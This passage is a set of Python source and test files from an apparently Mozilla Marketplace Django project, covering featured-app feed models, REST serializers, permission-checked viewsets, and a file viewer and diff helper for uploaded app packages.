########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
import amo.models
from amo.models import SlugField
from addons.models import Category, Preview
from translations.fields import PurifiedField, save_signal
import mkt.carriers
import mkt.regions
from mkt.collections.fields import ColorField
from mkt.collections.models import Collection
from mkt.constants.feed import FEEDAPP_TYPES
from mkt.ratings.validators import validate_rating
from mkt.webapps.models import Webapp
class FeedApp(amo.models.ModelBase):
"""
Thin wrapper around the Webapp class that allows single apps to be featured
on the feed.
"""
app = models.ForeignKey(Webapp)
feedapp_type = models.CharField(choices=FEEDAPP_TYPES, max_length=30)
description = PurifiedField()
slug = SlugField(max_length=30)
background_color = ColorField(null=True)
has_image = models.BooleanField(default=False)
# Optionally linked to a Preview (screenshot or video).
preview = models.ForeignKey(Preview, null=True, blank=True)
# Optionally linked to a pull quote.
pullquote_rating = models.PositiveSmallIntegerField(null=True, blank=True,
validators=[validate_rating])
pullquote_text = PurifiedField(null=True)
pullquote_attribution = PurifiedField(null=True)
class Meta:
db_table = 'mkt_feed_app'
def clean(self):
"""
Require `pullquote_text` if `pullquote_rating` or
`pullquote_attribution` are set.
"""
if not self.pullquote_text and (self.pullquote_rating or
self.pullquote_attribution):
raise ValidationError('Pullquote text required if rating or '
'attribution is defined.')
super(FeedApp, self).clean()
def image_path(self):
return os.path.join(settings.FEATURED_APP_BG_PATH,
str(self.pk / 1000),
'featured_app_%s.png' % (self.pk,))
class FeedItem(amo.models.ModelBase):
"""
Allows objects from multiple models to be hung off the feed.
"""
category = models.ForeignKey(Category, null=True, blank=True)
region = models.PositiveIntegerField(default=None, null=True, blank=True,
choices=mkt.regions.REGIONS_CHOICES_ID,
db_index=True)
carrier = models.IntegerField(default=None, null=True, blank=True,
choices=mkt.carriers.CARRIER_CHOICES,
db_index=True)
# Types of objects that may be contained by a feed item.
app = models.ForeignKey(FeedApp, null=True)
collection = models.ForeignKey(Collection, null=True)
class Meta:
db_table = 'mkt_feed_item'
# Save translations when saving a Feedapp instance.
models.signals.pre_save.connect(save_signal, sender=FeedApp,
dispatch_uid='feedapp_translations')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import relations, serializers
import amo
import mkt.carriers
import mkt.regions
from addons.models import Category
from mkt.api.fields import SplitField, TranslationSerializerField
from mkt.api.serializers import URLSerializerMixin
from mkt.collections.serializers import (CollectionImageField,
CollectionSerializer, SlugChoiceField,
SlugModelChoiceField)
from mkt.submit.serializers import PreviewSerializer
from mkt.webapps.serializers import AppSerializer
from .models import FeedApp, FeedItem
class FeedAppSerializer(URLSerializerMixin, serializers.ModelSerializer):
"""Thin wrappers around apps w/ metadata related to its feature in feed."""
app = SplitField(relations.PrimaryKeyRelatedField(required=True),
AppSerializer())
description = TranslationSerializerField(required=False)
image = CollectionImageField(
source='*',
view_name='feed-app-image-detail',
format='png')
preview = SplitField(relations.PrimaryKeyRelatedField(required=False),
PreviewSerializer())
pullquote_attribution = TranslationSerializerField(required=False)
pullquote_rating = serializers.IntegerField(required=False)
pullquote_text = TranslationSerializerField(required=False)
class Meta:
fields = ('app', 'background_color', 'description', 'feedapp_type',
'id', 'image', 'preview', 'pullquote_attribution',
'pullquote_rating', 'pullquote_text', 'slug', 'url')
model = FeedApp
url_basename = 'feedapps'
class FeedItemSerializer(URLSerializerMixin, serializers.ModelSerializer):
"""Thin wrappers around apps w/ metadata related to its feature in feed."""
carrier = SlugChoiceField(required=False,
choices_dict=mkt.carriers.CARRIER_MAP)
region = SlugChoiceField(required=False,
choices_dict=mkt.regions.REGION_LOOKUP)
category = SlugModelChoiceField(required=False,
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
item_type = serializers.SerializerMethodField('get_item_type')
# Types of objects that are allowed to be a feed item.
collection = SplitField(relations.PrimaryKeyRelatedField(required=False),
CollectionSerializer())
class Meta:
fields = ('carrier', 'category', 'collection', 'id', 'item_type',
'region', 'url')
item_types = ('collection',)
model = FeedItem
url_basename = 'feeditems'
def validate(self, attrs):
"""
Ensure that at least one object type is specified.
"""
item_changed = any(k for k in self.Meta.item_types if k in attrs.keys())
num_defined = sum(1 for item in self.Meta.item_types if attrs.get(item))
if item_changed and num_defined != 1:
message = ('A valid value for exactly one of the following '
'parameters must be defined: %s' % ','.join(
self.Meta.item_types))
raise serializers.ValidationError(message)
return attrs
def get_item_type(self, obj):
for item_type in self.Meta.item_types:
if getattr(obj, item_type):
return item_type
return
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import ok_
from django.core.exceptions import ValidationError
import amo.tests
from mkt.feed.models import FeedApp
from mkt.webapps.models import Webapp
from .test_views import FeedAppMixin
class TestFeedApp(FeedAppMixin, amo.tests.TestCase):
def setUp(self):
super(TestFeedApp, self).setUp()
self.feedapp_data.update(**self.pullquote_data)
self.feedapp_data['app'] = (
Webapp.objects.get(pk=self.feedapp_data['app']))
def test_create(self):
feedapp = FeedApp(**self.feedapp_data)
ok_(isinstance(feedapp, FeedApp))
feedapp.clean_fields() # Tests validators on fields.
feedapp.clean() # Test model validation.
feedapp.save() # Tests required fields.
def test_missing_pullquote_rating(self):
del self.feedapp_data['pullquote_rating']
self.test_create()
def test_missing_pullquote_text(self):
del self.feedapp_data['pullquote_text']
with self.assertRaises(ValidationError):
self.test_create()
def test_pullquote_rating_fractional(self):
"""
This passes because PositiveSmallIntegerField will coerce the float into
an int, which effectively returns math.floor(value).
"""
self.feedapp_data['pullquote_rating'] = 4.5
self.test_create()
def test_bad_pullquote_rating_low(self):
self.feedapp_data['pullquote_rating'] = -1
with self.assertRaises(ValidationError):
self.test_create()
def test_bad_pullquote_rating_high(self):
self.feedapp_data['pullquote_rating'] = 6
with self.assertRaises(ValidationError):
self.test_create()
########NEW FILE########
__FILENAME__ = test_serializers
# -*- coding: utf-8 -*-
from rest_framework import serializers
import amo
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.feed.serializers import FeedItemSerializer
from mkt.regions import RESTOFWORLD
class CollectionFeedMixin(object):
collection_data = {
'collection_type': COLLECTIONS_TYPE_BASIC,
'name': {'en-US': u'A collection of my favourite gàmes'},
'slug': 'my-favourite-games',
'description': {'en-US': u'A collection of my favourite gamés'},
}
def setUp(self):
self.collection = Collection.objects.create(**self.collection_data)
super(CollectionFeedMixin, self).setUp()
class TestFeedItemSerializer(CollectionFeedMixin, amo.tests.TestCase):
def serializer(self, item=None, **context):
if not item:
return FeedItemSerializer(context=context)
return FeedItemSerializer(item, context=context)
def validate(self, **attrs):
return self.serializer().validate(attrs=attrs)
def test_validate_passes(self):
self.validate(collection=self.collection)
def test_validate_fails_no_items(self):
with self.assertRaises(serializers.ValidationError):
self.validate(collection=None)
def test_region_handles_worldwide(self):
data = {
'region': 'worldwide',
'item_type': 'collection',
'collection': self.collection.id,
}
serializer = FeedItemSerializer(data=data)
assert serializer.is_valid()
assert serializer.object.region == RESTOFWORLD.id
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import json
from nose.tools import eq_, ok_
from django.core.urlresolvers import reverse
import mkt.carriers
import mkt.regions
from addons.models import Preview
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.feed.models import FeedApp, FeedItem
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class CollectionMixin(object):
collection_data = {
'author': u'My Àuthør',
'collection_type': COLLECTIONS_TYPE_BASIC,
'is_public': True,
'name': {'en-US': u'My Favorite Gamés'},
'slug': u'my-favourite-gamés',
}
def setUp(self):
self.collection = Collection.objects.create(**self.collection_data)
super(CollectionMixin, self).setUp()
class FeedAppMixin(object):
fixtures = fixture('webapp_337141')
def setUp(self):
self.feedapp_data = {
'app': 337141,
'background_color': '#B90000',
'feedapp_type': 'icon',
'description': {
'en-US': u'pan-fried potatoes'
},
'has_image': False,
'slug': 'my-feed-app',
}
self.pullquote_data = {
'pullquote_text': {'en-US': u'The bést!'},
'pullquote_rating': 4,
'pullquote_attribution': {'en-US': u'Jamés Bond'}
}
self.feedapps = []
super(FeedAppMixin, self).setUp()
def create_feedapps(self, n=2, **kwargs):
data = dict(self.feedapp_data)
data.update(kwargs)
if not isinstance(data['app'], Webapp):
data['app'] = Webapp.objects.get(pk=data['app'])
feedapps = [FeedApp.objects.create(**data) for idx in xrange(n)]
self.feedapps.extend(feedapps)
return feedapps
class BaseTestFeedItemViewSet(RestOAuth):
def setUp(self):
super(BaseTestFeedItemViewSet, self).setUp()
self.profile = self.user
def feed_permission(self):
"""
Grant the Feed:Curate permission to the authenticating user.
"""
self.grant_permission(self.profile, 'Feed:Curate')
class TestFeedItemViewSetList(CollectionMixin, BaseTestFeedItemViewSet):
"""
Tests the handling of GET requests to the list endpoint of FeedItemViewSet.
"""
def setUp(self):
super(TestFeedItemViewSetList, self).setUp()
self.url = reverse('api-v2:feeditems-list')
self.item = FeedItem.objects.create(collection=self.collection)
def list(self, client, **kwargs):
res = client.get(self.url, kwargs)
data = json.loads(res.content)
return res, data
def test_list_anonymous(self):
res, data = self.list(self.anon)
eq_(res.status_code, 200)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['id'], self.item.id)
def test_list_no_permission(self):
res, data = self.list(self.client)
eq_(res.status_code, 200)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['id'], self.item.id)
def test_list_with_permission(self):
self.feed_permission()
res, data = self.list(self.client)
eq_(res.status_code, 200)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['id'], self.item.id)
class TestFeedItemViewSetCreate(CollectionMixin, BaseTestFeedItemViewSet):
"""
Tests the handling of POST requests to the list endpoint of FeedItemViewSet.
"""
def setUp(self):
super(TestFeedItemViewSetCreate, self).setUp()
self.url = reverse('api-v2:feeditems-list')
def create(self, client, **kwargs):
res = client.post(self.url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_create_anonymous(self):
res, data = self.create(self.anon, collection=self.collection.pk)
eq_(res.status_code, 403)
def test_create_no_permission(self):
res, data = self.create(self.client, collection=self.collection.pk)
eq_(res.status_code, 403)
def test_create_with_permission(self):
self.feed_permission()
res, data = self.create(self.client, collection=self.collection.pk,
carrier=mkt.carriers.TELEFONICA.id,
region=mkt.regions.BR.id)
eq_(res.status_code, 201)
self.assertCORS(res, 'get', 'post')
eq_(data['collection']['id'], self.collection.pk)
def test_create_no_data(self):
self.feed_permission()
res, data = self.create(self.client)
eq_(res.status_code, 400)
class TestFeedItemViewSetDetail(CollectionMixin, BaseTestFeedItemViewSet):
"""
Tests the handling of GET requests to detail endpoints of FeedItemViewSet.
"""
def setUp(self):
super(TestFeedItemViewSetDetail, self).setUp()
self.item = FeedItem.objects.create(collection=self.collection)
self.url = reverse('api-v2:feeditems-detail',
kwargs={'pk': self.item.pk})
def detail(self, client, **kwargs):
res = client.get(self.url, kwargs)
data = json.loads(res.content)
return res, data
def test_list_anonymous(self):
res, data = self.detail(self.anon)
eq_(res.status_code, 200)
eq_(data['id'], self.item.pk)
def test_list_no_permission(self):
res, data = self.detail(self.client)
eq_(res.status_code, 200)
eq_(data['id'], self.item.pk)
def test_list_with_permission(self):
self.feed_permission()
res, data = self.detail(self.client)
eq_(res.status_code, 200)
eq_(data['id'], self.item.pk)
class TestFeedItemViewSetUpdate(CollectionMixin, BaseTestFeedItemViewSet):
"""
Tests the handling of PATCH requests to detail endpoints of FeedItemViewSet.
"""
def setUp(self):
super(TestFeedItemViewSetUpdate, self).setUp()
self.item = FeedItem.objects.create(collection=self.collection)
self.url = reverse('api-v2:feeditems-detail',
kwargs={'pk': self.item.pk})
def update(self, client, **kwargs):
res = client.patch(self.url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_update_anonymous(self):
res, data = self.update(self.anon)
eq_(res.status_code, 403)
def test_update_no_permission(self):
res, data = self.update(self.client)
eq_(res.status_code, 403)
def test_update_with_permission(self):
self.feed_permission()
res, data = self.update(self.client, region=mkt.regions.US.id)
eq_(res.status_code, 200)
eq_(data['id'], self.item.pk)
eq_(data['region'], mkt.regions.US.slug)
def test_update_no_items(self):
self.feed_permission()
res, data = self.update(self.client, collection=None)
eq_(res.status_code, 400)
class TestFeedItemViewSetDelete(CollectionMixin, BaseTestFeedItemViewSet):
"""
Tests the handling of DELETE requests to detail endpoints of
FeedItemViewSet.
"""
def setUp(self):
super(TestFeedItemViewSetDelete, self).setUp()
self.item = FeedItem.objects.create(collection=self.collection)
self.url = reverse('api-v2:feeditems-detail',
kwargs={'pk': self.item.pk})
def delete(self, client, **kwargs):
res = client.delete(self.url)
data = json.loads(res.content) if res.content else ''
return res, data
def test_update_anonymous(self):
res, data = self.delete(self.anon)
eq_(res.status_code, 403)
def test_update_no_permission(self):
res, data = self.delete(self.client)
eq_(res.status_code, 403)
def test_update_with_permission(self):
self.feed_permission()
res, data = self.delete(self.client)
eq_(res.status_code, 204)
class BaseTestFeedAppViewSet(FeedAppMixin, RestOAuth):
fixtures = FeedAppMixin.fixtures + RestOAuth.fixtures
def setUp(self):
super(BaseTestFeedAppViewSet, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.profile = self.user
def feed_permission(self):
"""
Grant the Feed:Curate permission to the authenticating user.
"""
self.grant_permission(self.profile, 'Feed:Curate')
class TestFeedAppViewSetList(BaseTestFeedAppViewSet):
"""
Tests the handling of GET requests to the list endpoint of FeedAppViewSet.
"""
num = 2
def setUp(self):
super(TestFeedAppViewSetList, self).setUp()
self.url = reverse('api-v2:feedapps-list')
self.create_feedapps(self.num)
def list(self, client):
res = client.get(self.url)
data = json.loads(res.content)
return res, data
def _test_list(self, client):
res, data = self.list(client)
eq_(res.status_code, 200)
objects = data['objects']
eq_(data['meta']['total_count'], self.num)
eq_(len(objects), self.num)
self.assertSetEqual([obj['id'] for obj in objects],
[fa.id for fa in self.feedapps])
def test_list_anonymous(self):
self._test_list(self.anon)
def test_list_no_permission(self):
self._test_list(self.client)
def test_list_with_permission(self):
self.feed_permission()
self._test_list(self.client)
class TestFeedAppViewSetCreate(BaseTestFeedAppViewSet):
"""
Tests the handling of POST requests to the list endpoint of FeedAppViewSet.
"""
fixtures = BaseTestFeedAppViewSet.fixtures
def setUp(self):
super(TestFeedAppViewSetCreate, self).setUp()
self.url = reverse('api-v2:feedapps-list')
def create(self, client, **kwargs):
res = client.post(self.url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_create_anonymous(self):
res, data = self.create(self.anon)
eq_(res.status_code, 403)
def test_create_no_permission(self):
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 403)
def test_create_with_permission(self):
self.feed_permission()
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 201)
eq_(data['app']['id'], self.feedapp_data['app'])
eq_(data['description'], self.feedapp_data['description'])
eq_(data['slug'], self.feedapp_data['slug'])
eq_(data['feedapp_type'], self.feedapp_data['feedapp_type'])
self.assertCORS(res, 'get', 'post')
return res, data
def test_create_with_background_color(self):
self.feedapp_data.update(background_color='#00AACC')
res, data = self.test_create_with_permission()
eq_(data['background_color'], '#00AACC')
def test_create_with_preview(self):
preview = Preview.objects.create(addon=self.app, position=0)
self.feedapp_data.update(preview=preview.pk)
res, data = self.test_create_with_permission()
eq_(data['preview']['id'], preview.id)
def test_create_with_pullquote(self):
self.feedapp_data.update(**self.pullquote_data)
res, data = self.test_create_with_permission()
for field, value in self.pullquote_data.iteritems():
eq_(data[field], value)
def test_create_with_pullquote_no_rating(self):
del self.pullquote_data['pullquote_rating']
self.test_create_with_pullquote()
def test_create_with_pullquote_no_text(self):
self.feed_permission()
del self.pullquote_data['pullquote_text']
self.feedapp_data.update(**self.pullquote_data)
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 400)
ok_('__all__' in data)
def test_create_with_pullquote_bad_rating_fractional(self):
self.feed_permission()
self.pullquote_data['pullquote_rating'] = 4.5
self.feedapp_data.update(**self.pullquote_data)
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 400)
ok_('pullquote_rating' in data)
def test_create_with_pullquote_bad_rating_high(self):
self.feed_permission()
self.pullquote_data['pullquote_rating'] = 6
self.feedapp_data.update(**self.pullquote_data)
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 400)
ok_('pullquote_rating' in data)
def test_create_with_pullquote_bad_rating_low(self):
self.feed_permission()
self.pullquote_data['pullquote_rating'] = -1
self.feedapp_data.update(**self.pullquote_data)
res, data = self.create(self.client, **self.feedapp_data)
eq_(res.status_code, 400)
ok_('pullquote_rating' in data)
def test_create_no_data(self):
self.feed_permission()
res, data = self.create(self.client)
eq_(res.status_code, 400)
class TestFeedAppViewSetDetail(BaseTestFeedAppViewSet):
"""
Tests the handling of GET requests to detail endpoints of FeedAppViewSet.
"""
def setUp(self):
super(TestFeedAppViewSetDetail, self).setUp()
self.feedapp = self.create_feedapps(1)[0]
self.url = reverse('api-v2:feedapps-detail',
kwargs={'pk': self.feedapp.pk})
def detail(self, client, **kwargs):
res = client.get(self.url)
data = json.loads(res.content)
return res, data
def _test_detail(self, client):
res, data = self.detail(client)
eq_(res.status_code, 200)
eq_(data['id'], self.feedapp.pk)
eq_(data['url'], self.url)
eq_(data['app']['id'], self.feedapp.app.id)
ok_(not data['preview'])
ok_(not data['pullquote_text'])
def test_detail_anonymous(self):
self._test_detail(self.anon)
def test_detail_no_permission(self):
self._test_detail(self.client)
def test_detail_with_permission(self):
self.feed_permission()
self._test_detail(self.client)
class TestFeedAppViewSetUpdate(BaseTestFeedAppViewSet):
"""
Tests the handling of PATCH requests to detail endpoints of FeedAppViewSet.
"""
fixtures = BaseTestFeedAppViewSet.fixtures
def setUp(self):
super(TestFeedAppViewSetUpdate, self).setUp()
self.feedapp = self.create_feedapps(1)[0]
self.url = reverse('api-v2:feedapps-detail',
kwargs={'pk': self.feedapp.pk})
def update(self, client, **kwargs):
res = client.patch(self.url, json.dumps(kwargs))
data = json.loads(res.content)
return res, data
def test_update_anonymous(self):
res, data = self.update(self.anon)
eq_(res.status_code, 403)
def test_update_no_permission(self):
res, data = self.update(self.client, **self.feedapp_data)
eq_(res.status_code, 403)
def test_update_with_permission(self):
self.feed_permission()
new_description = {
'en-US': u"BastaCorp's famous pan-fried potatoes",
'fr': u'pommes de terre sautées de BastaCorp'
}
res, data = self.update(self.client, description=new_description)
eq_(res.status_code, 200)
eq_(data['description'], new_description)
def test_update_invalid_app(self):
self.feed_permission()
res, data = self.update(self.client, app=1)
eq_(res.status_code, 400)
ok_('app' in data)
def test_update_no_app(self):
self.feed_permission()
res, data = self.update(self.client, app=None)
eq_(res.status_code, 400)
ok_('app' in data)
class TestFeedAppViewSetDelete(BaseTestFeedAppViewSet):
"""
Tests the handling of DELETE requests to detail endpoints of FeedAppViewSet.
"""
def setUp(self):
super(TestFeedAppViewSetDelete, self).setUp()
self.feedapp = self.create_feedapps(1)[0]
self.url = reverse('api-v2:feedapps-detail',
kwargs={'pk': self.feedapp.pk})
def delete(self, client, **kwargs):
res = client.delete(self.url)
data = json.loads(res.content) if res.content else ''
return res, data
def test_delete_anonymous(self):
res, data = self.delete(self.anon)
eq_(res.status_code, 403)
def test_delete_no_permission(self):
res, data = self.delete(self.client)
eq_(res.status_code, 403)
def test_delete_with_permission(self):
self.feed_permission()
res, data = self.delete(self.client)
eq_(res.status_code, 204)
########NEW FILE########
__FILENAME__ = views
from rest_framework import viewsets
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowReadOnly, AnyOf, GroupPermission
from mkt.api.base import CORSMixin
from mkt.collections.views import CollectionImageViewSet
from .models import FeedApp, FeedItem
from .serializers import FeedAppSerializer, FeedItemSerializer
class FeedItemViewSet(CORSMixin, viewsets.ModelViewSet):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
permission_classes = [AnyOf(AllowReadOnly,
GroupPermission('Feed', 'Curate'))]
queryset = FeedItem.objects.all()
cors_allowed_methods = ('get', 'post')
serializer_class = FeedItemSerializer
class FeedAppViewSet(CORSMixin, viewsets.ModelViewSet):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
permission_classes = [AnyOf(AllowReadOnly,
GroupPermission('Feed', 'Curate'))]
queryset = FeedApp.objects.all()
cors_allowed_methods = ('get', 'post')
serializer_class = FeedAppSerializer
class FeedAppImageViewSet(CollectionImageViewSet):
queryset = FeedApp.objects.all()
########NEW FILE########
__FILENAME__ = helpers
import codecs
import json
import mimetypes
import os
import stat
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_unicode
import commonware.log
import jinja2
from cache_nuggets.lib import memoize, Message
from jingo import env, register
from tower import ugettext as _
import amo
from amo.utils import rm_local_tmp_dir
from files.utils import extract_xpi, get_md5
from validator.testcases.packagelayout import (blacklisted_extensions,
blacklisted_magic_numbers)
# Allow files with a shebang through.
blacklisted_magic_numbers = [
b for b in list(blacklisted_magic_numbers) if b != (0x23, 0x21)]
blacklisted_extensions = [
b for b in list(blacklisted_extensions) if b != 'sh']
task_log = commonware.log.getLogger('z.task')
@register.function
def file_viewer_class(value, key):
result = []
if value['directory']:
result.append('directory closed')
else:
result.append('file')
if value['short'] == key:
result.append('selected')
if value.get('diff'):
result.append('diff')
return ' '.join(result)
@register.function
def file_tree(files, selected):
depth = 0
output = ['<ul class="root">']
t = env.get_template('fileviewer/node.html')
for k, v in files.items():
if v['depth'] > depth:
output.append('<ul class="js-hidden">')
elif v['depth'] < depth:
output.extend(['</ul>' for x in range(v['depth'], depth)])
output.append(t.render({'value': v, 'selected': selected}))
depth = v['depth']
output.extend(['</ul>' for x in range(depth, -1, -1)])
return jinja2.Markup('\n'.join(output))
class FileViewer(object):
"""
Provide access to a storage-managed file by copying it locally and
extracting info from it. `src` is a storage-managed path and `dest` is a
local temp path.
"""
def __init__(self, file_obj):
self.file = file_obj
self.addon = self.file.version.addon
self.src = (file_obj.guarded_file_path
if file_obj.status == amo.STATUS_DISABLED
else file_obj.file_path)
self.dest = os.path.join(settings.TMP_PATH, 'file_viewer',
str(file_obj.pk))
self._files, self.selected = None, None
def __str__(self):
return str(self.file.id)
def _extraction_cache_key(self):
return ('%s:file-viewer:extraction-in-progress:%s' %
(settings.CACHE_PREFIX, self.file.id))
def extract(self):
"""
Will make all the directories and expand the files.
Raises error on nasty files.
"""
try:
os.makedirs(os.path.dirname(self.dest))
except OSError, err:
pass
# This is called `extract_xpi` but it unzips like a zip file.
try:
extract_xpi(self.src, self.dest, expand=True)
except Exception, err:
task_log.error('Error (%s) extracting %s' % (err, self.src))
raise
def cleanup(self):
if os.path.exists(self.dest):
rm_local_tmp_dir(self.dest)
def is_extracted(self):
"""If the file has been extracted or not."""
return (os.path.exists(self.dest) and not
Message(self._extraction_cache_key()).get())
def _is_binary(self, mimetype, path):
"""Uses the filename to see if the file can be shown in HTML or not."""
# Re-use the blacklisted data from amo-validator to spot binaries.
ext = os.path.splitext(path)[1][1:]
if ext in blacklisted_extensions:
return True
if os.path.exists(path) and not os.path.isdir(path):
with storage.open(path, 'r') as rfile:
bytes = tuple(map(ord, rfile.read(4)))
if any(bytes[:len(x)] == x for x in blacklisted_magic_numbers):
return True
if mimetype:
major, minor = mimetype.split('/')
if major == 'image':
return 'image' # Mark that the file is binary, but an image.
return False
def read_file(self, allow_empty=False):
"""
Reads the file. Imposes a file limit and tries to cope with
UTF-8 and UTF-16 files appropriately. Return file contents and
a list of error messages.
"""
try:
file_data = self._read_file(allow_empty)
# If this is a webapp manifest, we should try to pretty print it.
if (self.selected and
self.selected.get('filename') == 'manifest.webapp'):
file_data = self._process_manifest(file_data)
return file_data
except (IOError, OSError):
self.selected['msg'] = _('That file no longer exists.')
return ''
def _read_file(self, allow_empty=False):
if not self.selected and allow_empty:
return ''
assert self.selected, 'Please select a file'
if self.selected['size'] > settings.FILE_VIEWER_SIZE_LIMIT:
# L10n: {0} is the file size limit of the file viewer.
msg = _(u'File size is over the limit of {0}.').format(
filesizeformat(settings.FILE_VIEWER_SIZE_LIMIT))
self.selected['msg'] = msg
return ''
with storage.open(self.selected['full'], 'r') as opened:
cont = opened.read()
codec = 'utf-16' if cont.startswith(codecs.BOM_UTF16) else 'utf-8'
try:
return cont.decode(codec)
except UnicodeDecodeError:
cont = cont.decode(codec, 'ignore')
#L10n: {0} is the filename.
self.selected['msg'] = (
_('Problems decoding {0}.').format(codec))
return cont
def _process_manifest(self, data):
"""
This will format the manifest nicely for maximum diff-ability.
"""
try:
json_data = json.loads(data)
except Exception:
# If there are any JSON decode problems, just return the raw file.
return data
def format_dict(data):
def do_format(value):
if isinstance(value, dict):
return format_dict(value)
else:
return value
# We want everything sorted, but we always want these few nodes
# right at the top.
prefix_nodes = ['name', 'description', 'version']
prefix_nodes = [(k, data.pop(k)) for k in prefix_nodes if
k in data]
processed_nodes = [(k, do_format(v)) for k, v in data.items()]
return SortedDict(prefix_nodes + sorted(processed_nodes))
return json.dumps(format_dict(json_data), indent=2)
def select(self, file_):
self.selected = self.get_files().get(file_)
def is_binary(self):
if self.selected:
binary = self.selected['binary']
if binary and binary != 'image':
self.selected['msg'] = _('This file is not viewable online. '
'Please download the file to view '
'the contents.')
return binary
def is_directory(self):
if self.selected:
if self.selected['directory']:
self.selected['msg'] = _('This file is a directory.')
return self.selected['directory']
def get_default(self, key=None):
"""Gets the default file and copes with search engines."""
if key:
return key
return 'manifest.webapp'
def get_files(self):
"""
Returns a SortedDict, ordered by the filename of all the files in the
addon-file. Full of all the useful information you'll need to serve
this file, build templates etc.
"""
if self._files:
return self._files
if not self.is_extracted():
return {}
# In case a cron job comes along and deletes the files
# mid tree building.
try:
self._files = self._get_files()
return self._files
except (OSError, IOError):
return {}
def truncate(self, filename, pre_length=15, post_length=10,
ellipsis=u'..'):
"""
Truncates a filename so that
somelongfilename.htm
becomes:
some...htm
as it truncates around the extension.
"""
root, ext = os.path.splitext(filename)
if len(root) > pre_length:
root = root[:pre_length] + ellipsis
if len(ext) > post_length:
ext = ext[:post_length] + ellipsis
return root + ext
def get_syntax(self, filename):
"""
Converts a filename into a syntax for the syntax highlighter, with
some modifications for specific common mozilla files.
The list of syntaxes is from:
http://alexgorbatchev.com/SyntaxHighlighter/manual/brushes/
"""
if filename:
short = os.path.splitext(filename)[1][1:]
syntax_map = {'xul': 'xml', 'rdf': 'xml', 'jsm': 'js',
'json': 'js', 'webapp': 'js'}
short = syntax_map.get(short, short)
if short in ['actionscript3', 'as3', 'bash', 'shell', 'cpp', 'c',
'c#', 'c-sharp', 'csharp', 'css', 'diff', 'html',
'java', 'javascript', 'js', 'jscript', 'patch',
'pas', 'php', 'plain', 'py', 'python', 'sass',
'scss', 'text', 'sql', 'vb', 'vbnet', 'xml', 'xhtml',
'xslt']:
return short
return 'plain'
@memoize(prefix='file-viewer', time=60 * 60)
def _get_files(self):
all_files, res = [], SortedDict()
# Not using os.path.walk so we get just the right order.
def iterate(path):
path_dirs, path_files = storage.listdir(path)
for dirname in sorted(path_dirs):
full = os.path.join(path, dirname)
all_files.append(full)
iterate(full)
for filename in sorted(path_files):
full = os.path.join(path, filename)
all_files.append(full)
iterate(self.dest)
for path in all_files:
filename = smart_unicode(os.path.basename(path), errors='replace')
short = smart_unicode(path[len(self.dest) + 1:], errors='replace')
mime, encoding = mimetypes.guess_type(filename)
if not mime and filename == 'manifest.webapp':
mime = 'application/x-web-app-manifest+json'
directory = os.path.isdir(path)
res[short] = {
'binary': self._is_binary(mime, path),
'depth': short.count(os.sep),
'directory': directory,
'filename': filename,
'full': path,
'md5': get_md5(path) if not directory else '',
'mimetype': mime or 'application/octet-stream',
'syntax': self.get_syntax(filename),
'modified': os.stat(path)[stat.ST_MTIME],
'short': short,
'size': os.stat(path)[stat.ST_SIZE],
'truncated': self.truncate(filename),
'url': reverse('mkt.files.list',
args=[self.file.id, 'file', short]),
'url_serve': reverse('mkt.files.redirect',
args=[self.file.id, short]),
'version': self.file.version.version,
}
return res
class DiffHelper(object):
def __init__(self, left, right):
self.left = FileViewer(left)
self.right = FileViewer(right)
self.addon = self.left.addon
self.key = None
def __str__(self):
return '%s:%s' % (self.left, self.right)
def extract(self):
self.left.extract(), self.right.extract()
def cleanup(self):
self.left.cleanup(), self.right.cleanup()
def is_extracted(self):
return self.left.is_extracted() and self.right.is_extracted()
def get_url(self, short):
url_name = 'mkt.files.compare'
return reverse(url_name,
args=[self.left.file.id, self.right.file.id,
'file', short])
#@memoize(prefix='file-viewer-get-files', time=60 * 60)
def get_files(self):
"""
Get the files from the primary and:
- remap any diffable ones to the compare url as opposed to the other
- highlight any diffs
"""
left_files = self.left.get_files()
right_files = self.right.get_files()
different = []
for key, file in left_files.items():
file['url'] = self.get_url(file['short'])
diff = file['md5'] != right_files.get(key, {}).get('md5')
file['diff'] = diff
if diff:
different.append(file)
# Now mark every directory above each different file as different.
for diff in different:
for depth in range(diff['depth']):
key = '/'.join(diff['short'].split('/')[:depth + 1])
if key in left_files:
left_files[key]['diff'] = True
return left_files
#@memoize(prefix='file-viewer-get-deleted-files', time=60 * 60)
def get_deleted_files(self):
"""
Get files that exist in right, but not in left. These
are files that have been deleted between the two versions.
Every element will be marked as a diff.
"""
different = SortedDict()
left_files = self.left.get_files()
right_files = self.right.get_files()
for key, file in right_files.items():
if key not in left_files:
copy = right_files[key]
copy.update({'url': self.get_url(file['short']), 'diff': True})
different[key] = copy
return different
def read_file(self):
"""Reads both selected files."""
